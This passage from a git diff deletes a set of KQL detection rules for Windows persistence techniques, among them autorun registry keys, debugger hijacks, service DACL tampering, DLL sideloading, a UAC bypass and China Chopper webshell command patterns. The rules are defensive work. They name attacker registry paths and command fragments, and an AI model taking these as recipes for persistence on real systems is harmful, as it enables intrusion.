new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes -// Tags: attack.persistence -DeviceRegistryEvents -| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p")) \ No newline at end of file diff --git a/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql b/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql deleted file mode 100644 index 2d468438..00000000 --- a/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger" \ No newline at end of file diff --git a/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql b/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql deleted file mode 100644 index 62bd55fb..00000000 --- a/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2021/12/30 -// Level: medium -// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. -A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. - -// Tags: attack.persistence, attack.t1547.010 -DeviceRegistryEvents -| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\Control\\Print\\Monitors") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey contains "Control\\Print\\Environments" and RegistryKey contains "\\Drivers" and RegistryKey contains "\\VNC Printer")))) \ No newline at end of file diff --git a/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql deleted file mode 100644 index 0fd4d7cb..00000000 --- a/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/28 -// Level: high -// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. -// Tags: attack.persistence, attack.t1543.003 -DeviceProcessEvents -| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD") \ No newline at end of file diff --git a/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql b/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql deleted file mode 100644 index d35ec172..00000000 --- a/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/22 -// Level: high -// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking -// Tags: attack.privilege_escalation, attack.persistence, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Persistence/Atbroker_Registry_Change.kql b/Persistence/Atbroker_Registry_Change.kql deleted file mode 100644 index 465dcede..00000000 --- a/Persistence/Atbroker_Registry_Change.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Mateusz Wydra, oscd.community -// Date: 2020/10/13 -// Level: medium -// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' -// Tags: attack.defense_evasion, attack.t1218, attack.persistence, attack.t1547 -DeviceRegistryEvents -| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs")))) \ No newline at end of file diff --git a/Persistence/Bypass_UAC_Using_Event_Viewer.kql b/Persistence/Bypass_UAC_Using_Event_Viewer.kql deleted file mode 100644 index 8ebc277f..00000000 --- a/Persistence/Bypass_UAC_Using_Event_Viewer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/05 -// Level: high -// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification -// Tags: attack.persistence, attack.t1547.010 -DeviceRegistryEvents -| where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %")) \ No newline at end of file diff --git a/Persistence/COM_Hijacking_via_TreatAs.kql b/Persistence/COM_Hijacking_via_TreatAs.kql deleted file mode 100644 index 1acd1872..00000000 --- a/Persistence/COM_Hijacking_via_TreatAs.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/28 -// Level: medium -// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) \ No newline at end of file diff --git a/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql b/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql deleted file mode 100644 index 30e0a99f..00000000 --- a/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects when a program changes the default file association of any extension to an executable. -When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. - -// Tags: attack.persistence, attack.t1546.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile")) \ No newline at end of file diff --git a/Persistence/Change_Default_File_Association_Via_Assoc.kql b/Persistence/Change_Default_File_Association_Via_Assoc.kql deleted file mode 100644 index 782118cf..00000000 --- a/Persistence/Change_Default_File_Association_Via_Assoc.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community -// Date: 2019/10/21 -// Level: low -// Description: Detects file association changes using the builtin "assoc" command. -When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. - -// Tags: attack.persistence, attack.t1546.001 -DeviceProcessEvents -| where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql b/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql deleted file mode 100644 index 9db5f4d8..00000000 --- a/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/12/30 -// Level: medium -// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. -Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. -Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services - -// Tags: attack.persistence, attack.t1574.011 -DeviceProcessEvents -| where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d ") \ No newline at end of file diff --git a/Persistence/Chopper_Webshell_Process_Pattern.kql b/Persistence/Chopper_Webshell_Process_Pattern.kql deleted file mode 100644 index 41494db7..00000000 --- a/Persistence/Chopper_Webshell_Process_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), MSTI (query) -// Date: 2022/10/01 -// Level: high -// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells -// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 -DeviceProcessEvents -| where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") \ No newline at end of file diff --git a/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql b/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql deleted file mode 100644 index 89bb9dfa..00000000 --- a/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) -// Date: 2022/06/19 -// Level: medium -// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension -// Tags: attack.persistence, attack.t1176 -DeviceProcessEvents -| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/Persistence/Classes_Autorun_Keys_Modification.kql b/Persistence/Classes_Autorun_Keys_Modification.kql deleted file mode 100644 index e4bc363b..00000000 --- a/Persistence/Classes_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey contains "\\lnkfile\\shellex\\ContextMenuHandlers")))) \ No newline at end of file diff --git a/Persistence/Common_Autorun_Keys_Modification.kql b/Persistence/Common_Autorun_Keys_Modification.kql deleted file mode 100644 index de1f0fb4..00000000 --- a/Persistence/Common_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\poqexec.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey contains "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler" or RegistryKey contains "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/Persistence/Control_Panel_Items.kql b/Persistence/Control_Panel_Items.kql deleted file mode 100644 index de98b896..00000000 --- a/Persistence/Control_Panel_Items.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_) -// Date: 2020/06/22 -// Level: high -// Description: Detects the malicious use of a control panel item -// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546 -DeviceProcessEvents -| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|"))))) \ No newline at end of file diff --git a/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql b/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql deleted file mode 100644 index 9ec0a25c..00000000 --- a/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2021/12/30 -// Level: high -// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. -Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. - -// Tags: attack.persistence, attack.t1547.009 -DeviceFileEvents -| where FolderPath =~ "C:\\program.exe" \ No newline at end of file diff --git a/Persistence/Creation_Of_Non-Existent_System_DLL.kql b/Persistence/Creation_Of_Non-Existent_System_DLL.kql deleted file mode 100644 index 973ed62c..00000000 --- a/Persistence/Creation_Of_Non-Existent_System_DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), fornotes -// Date: 2022/12/01 -// Level: medium -// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). -Usually this technique is used to achieve DLL hijacking. - -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceFileEvents -| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll" \ No newline at end of file diff --git a/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql b/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql deleted file mode 100644 index b8dc45ff..00000000 --- a/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/05/03 -// Level: high -// Description: Sysmon registry detection of a local hidden user account. -// Tags: attack.persistence, attack.t1136.001 -DeviceRegistryEvents -| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey contains "\\SAM\\SAM\\Domains\\Account\\Users\\Names" and RegistryKey endswith "$" \ No newline at end of file diff --git a/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql b/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql deleted file mode 100644 index f9303a14..00000000 --- a/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/05/09 -// Level: high -// Description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking -// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001 -DeviceFileEvents -| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysWOW64\\" or FolderPath contains "\\WinSxS\\"))) \ No newline at end of file diff --git a/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql b/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql deleted file mode 100644 index 47714943..00000000 --- a/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or (RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver")))) \ No newline at end of file diff --git a/Persistence/CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/CurrentVersion_Autorun_Keys_Modification.kql deleted file mode 100644 index d035ba97..00000000 --- a/Persistence/CurrentVersion_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey contains "\\Run" or RegistryKey contains "\\RunOnce" or RegistryKey contains "\\RunOnceEx" or RegistryKey contains "\\RunServices" or RegistryKey contains "\\RunServicesOnce" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not((((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\Setup\\") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith "C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey contains "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}" or RegistryKey contains "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}" or RegistryKey contains "\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}" or 